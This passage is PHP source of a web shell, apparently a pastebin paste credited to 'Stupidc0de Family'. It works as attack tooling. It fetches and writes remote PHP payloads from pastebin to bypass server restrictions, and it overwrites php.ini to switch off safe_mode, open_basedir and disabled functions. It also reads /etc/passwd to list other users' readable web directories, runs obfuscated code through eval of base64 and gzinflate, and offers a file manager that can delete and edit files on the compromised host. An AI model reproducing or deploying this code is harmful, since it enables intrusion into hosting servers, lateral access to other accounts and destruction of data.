  1829. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
  1830. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
  1831. mkdir('bysyswsf', 0755);
  1832. chdir('bysyswsf');
  1833. $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
  1834. $file = fopen("bysyswsf.php" ,"w+");
  1835. $write = fwrite ($file ,$bysyswsf);
  1836. fclose($file);
  1837. chmod("bysyswsf.php",0755);
  1838. echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
  1839. }
  1840. ////////////////////////////////////////
  1841. ////////////////////////////////////////
  1842. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
  1843. $byht = "safe_mode = Off
  1844. disable_functions = None
  1845. safe_mode_gid = OFF
  1846. open_basedir = OFF
  1847. allow_url_fopen = On";
  1848. file_put_contents("php.ini",$byht);
  1849. echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
  1850. die('<meta http-equiv="refresh" content="0; url=?" />');
  1851. }
  1852. ////////////////////////////////////////
  1853. ///////////////////////////////////////
  1854. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
  1855. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
  1856. mkdir('bysyswexecf', 0755);
  1857. chdir('bysyswexecf');
  1858. $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
  1859. $file = fopen("bysyswexecf.php" ,"w+");
  1860. $write = fwrite ($file ,$bysyswsf);
  1861. fclose($file);
  1862. chmod("bysyswexecf.php",0755);
  1863. echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
  1864. }
  1865. ////////////////////////////////////////
  1866. ////////////////////////////////////////
  1867.  
  1868. ///////////////////////////////////////////////////////////////////////////
  1869. ///////////JUMPING////////////////////////////////////////////////////////
  1870. //////////////////////////////////////////
  1871. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
  1872. ?>
  1873. <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
  1874. <?php
  1875. //radable public_html
  1876. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1877. set_time_limit(0);
  1878. ###################
  1879. @$passwd = fopen('/etc/passwd','r');
  1880. if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
  1881. $pub = array();
  1882. $users = array();
  1883. $conf = array();
  1884. $i = 0;
  1885. while(!feof($passwd))
  1886. {
  1887. $str = fgets($passwd);
  1888. if ($i > 35)
  1889. {
  1890. $pos = strpos($str,':');
  1891. $username = substr($str,0,$pos);
  1892. $dirz = '/home/'.$username.'/public_html/';
  1893. if (($username != ''))
  1894. {
  1895. if (is_readable($dirz))
  1896. {
  1897. array_push($users,$username);
  1898. array_push($pub,$dirz);
  1899. }
  1900. }
  1901. }
  1902. $i++;
  1903. }
  1904. ###################
  1905. echo '<br><br></center></center>';
  1906. echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
  1907. echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
  1908. echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
  1909. foreach ($users as $user)
  1910. {
  1911. $path = "/home/$user/public_html/";
  1912. echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
  1913. }
  1914. echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
  1915. echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
  1916. echo '<br><br></b></body><center>';
  1917. }
  1918. ///////////////
  1919. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
  1920. /////////////
  1921.  
  1922. /*
  1923. File Manager
  1924. Dimulai Dari Sini
  1925. */
  1926. else{
  1927. echo '</table><br />';
  1928. ////////////////////////////////////////////////////////////////////////
  1929. /////////////////////////////////////////////////////////////////////////
  1930. echo "<center>";
  1931. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  1932. if($_POST['type'] == 'dir'){
  1933. if(rmdir($_POST['path'])){
  1934. echo '<script>alert("Delete Dir Sukses!");</script>';
  1935. }else{
  1936. echo '<script>alert("Delete Dir Gagal!");</script>';
  1937. }
  1938. }elseif($_POST['type'] == 'file'){
  1939. if(unlink($_POST['path'])){
  1940. echo '<script>alert("Delete File Sukses!");</script>';
  1941. }else{
  1942. echo '<script>alert("Delete File Gagal!");</script>';
  1943. }
  1944. }
  1945. }
  1946. echo '</center>';
  1947. $scandir = scandir($path);
  1948. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  1949. ';
  1950.  
  1951. foreach($scandir as $dir){
  1952. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  1953. echo "<tr>
  1954. <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
  1955. <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
  1956. <td><center>";
  1957. if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
  1958. elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
  1959. echo perms("$path/$dir");
  1960. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  1961.  
  1962. echo "</center></td>
  1963. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  1964. <select class='bordergaya' name=\"opt\">
  1965. <option value=\"\"></option>
  1966. <option value=\"delete\">Delete</option>
  1967. <option value=\"chmod\">Chmod</option>
  1968. <option value=\"rename\">Rename</option>
  1969. </select>
  1970. <input type=\"hidden\" name=\"type\" value=\"dir\">
  1971. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  1972. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  1973. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  1974. </form></center></td>
  1975. </tr>";
  1976. }
  1977. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  1978. foreach($scandir as $file){
  1979. if(!is_file("$path/$file")) continue;
  1980. $size = filesize("$path/$file")/1024;
  1981. $size = round($size,3);
  1982. if($size >= 1024){
  1983. $size = round($size/1024,2).' MB';
  1984. }else{
  1985. $size = $size.' KB';
  1986. }
  1987.  
  1988. echo "<tr>
  1989. <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  1990. <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
  1991. <td><center>";
  1992. if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
  1993. elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
  1994. echo perms("$path/$file");
  1995. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  1996. echo "</center></td>
  1997. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  1998. <select class='bordergaya' name=\"opt\">
  1999. <option value=\"\"></option>
  2000. <option value=\"delete\">Delete</option>
  2001. <option value=\"chmod\">Chmod</option>
  2002. <option value=\"rename\">Rename</option>
  2003. <option value=\"edit\">Edit</option>
  2004. </select>
  2005. <input type=\"hidden\" name=\"type\" value=\"file\">
  2006. <input type=\"hidden\" name=\"name\" value=\"$file\">
  2007. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  2008. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
  2009. </form></center></td>
  2010. </tr>";
  2011. }
  2012. echo '</table>
  2013. </div>';
  2014. }
  2015. ///////////////////////////////////////////////////////////////////////
  2016. ////////////////////////////////////////////////////////////////////////
  2017.  
  2018.  
  2019.  
  2020. ?>
  2021. <br/><br/>
  2022. <script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("<font face='Fredericka the Great' size='3px' color='grey'>&copy; Stupidc0de Family " + copyright +"</font> "); </script>
  2023. </BODY></html>
Add Comment
Please, Sign In to add comment